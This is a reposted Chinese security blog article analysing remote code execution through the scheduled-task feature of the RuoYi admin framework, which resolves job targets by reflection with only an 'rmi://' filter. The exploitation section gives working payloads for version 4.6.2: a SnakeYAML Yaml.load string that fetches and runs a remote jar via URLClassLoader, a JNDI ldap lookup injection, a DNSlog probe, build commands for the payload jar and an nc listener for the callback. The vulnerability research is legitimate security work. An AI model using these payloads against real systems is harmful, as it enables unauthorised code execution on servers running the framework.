若依定时任务的实现是通过反射调来调用目标类,目标类的类名可控导致rce。在版本迭代中增加了黑白名单来防御,但仍然可绕过!
前言
关于若依漏洞或者是审计的文章网上挺多的,本来就只是想写一下最新版4.7.8的RCE。因为之前没接触过若依就打算看看定时任务实现的原理以及历史的漏洞,但是在查阅资料的时候,发现了一些文章给的poc有问题,比如作者写的是<4.7.2时,给的是org.springframework.jndi.JndiLocatorDelegate.lookup('r'm'i://ip:端口/refObj')
,大概作者的目的是想说明可以通过若依对字符串的处理的一些问题(参数中的'
会替换为空)绕过对rmi
的过滤,但是却没有考虑到org.springframework.jndi
在4.7.1版本中已经加入了黑名单。作者也只是给出了poc,并没有复现的过程!
计划任务实现原理
从官方文档可以看出可以通过两种方法调用目标类:
-
Bean调用示例:ryTask.ryParams('ry')
-
Class类调用示例:com.ruoyi.quartz.task.RyTask.ryParams('ry')
接下来咱调试一下,看看具体是如何实现的这个功能的
首先直接在测试类下个断点,看看调用
通过系统默认的任务1来执行这个测试类
在调用过程中,会发现在com.ruoyi.quartz.util.JobInvokeUtil
类中存在两个名为invokeMethod
的方法,并前后各调用了一次
在第一个invokeMethod
方法中对调用目标字符串的类型进行判断,判断是Bean还是Class。然后调用第二个invokeMethod
方法
-
bean就通过getBean()直接获取bean的实例
-
类名就通过反射获取类的实例
if (!isValidClassName(beanName)){
Object bean = SpringUtils.getBean(beanName);
invokeMethod(bean, methodName, methodParams);
}
else
{
Object bean = Class.forName(beanName).newInstance();
invokeMethod(bean, methodName, methodParams);
}
第二个invokeMethod
这个方法通过反射来加载测试类
if (StringUtils.isNotNull(methodParams) && methodParams.size() > 0){
Method method = bean.getClass().getDeclaredMethod(methodName, getMethodParamsType(methodParams));
method.invoke(bean, getMethodParamsValue(methodParams));
}
这大概就是定时任务加载类的逻辑
漏洞成因
接着我们新增一个定时任务,看看在创建的过程中对调用目标字符串做了哪些处理
抓包可以看到直接调用了/monitor/job/add
这个接口
可以看到就只是判断了一下,目标字符串是否包含rmi://
,这就导致导致攻击者可以调用任意类、方法及参数触发反射执行命令。
由于反射时所需要的:类、方法、参数都是我们可控的,所以我们只需传入一个能够执行命令的类方法就能达到getshell的目的,该类只需要满足如下几点要求即可:
-
具有public类型的无参构造方法
-
自身具有public类型且可以执行命令的方法
4.6.2
因为目前对调用目标字符串限制不多,so直接拿网上公开的poc打吧!
-
使用Yaml.load()来打SnakeYAML反序列化
-
JNDI注入
SnakeYAML反序列化
探测SnakeYAMLpoc:
String poc = "{!!java.net.URL ["http://5dsff0.dnslog.cn/"]: 1}";
利用SPI机制-基于ScriptEngineManager利用链来执行命令,直接使用这个师傅写好的脚本:https://github.com/artsploit/yaml-payload
1)把这块修改成要执行的命令
2)把项目生成jar包
javac src/artsploit/AwesomeScriptEngineFactory.java //编译java文件
jar -cvf yaml-payload.jar -C src/ . //打包成jar包
3)在yaml-payload.jar根目录下起一个web服务
python -m http.server 9999
4)在计划任务添加payload,执行
org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://127.0.0.1:9999/yaml-payload.jar"]]]]')
JNDI注入
使用yakit起一个返连服务
poc:
javax.naming.InitialContext.lookup('ldap://127.0.0.1:8085/calc')
nc监听端口
文章来源: https://forum.butian.net/share/2796
文章作者:Yu9
如有侵权请联系我们,我们会进行删除并致歉
声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。
原文始发于微信公众号(白帽子左一):若依最新版后台RCE
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论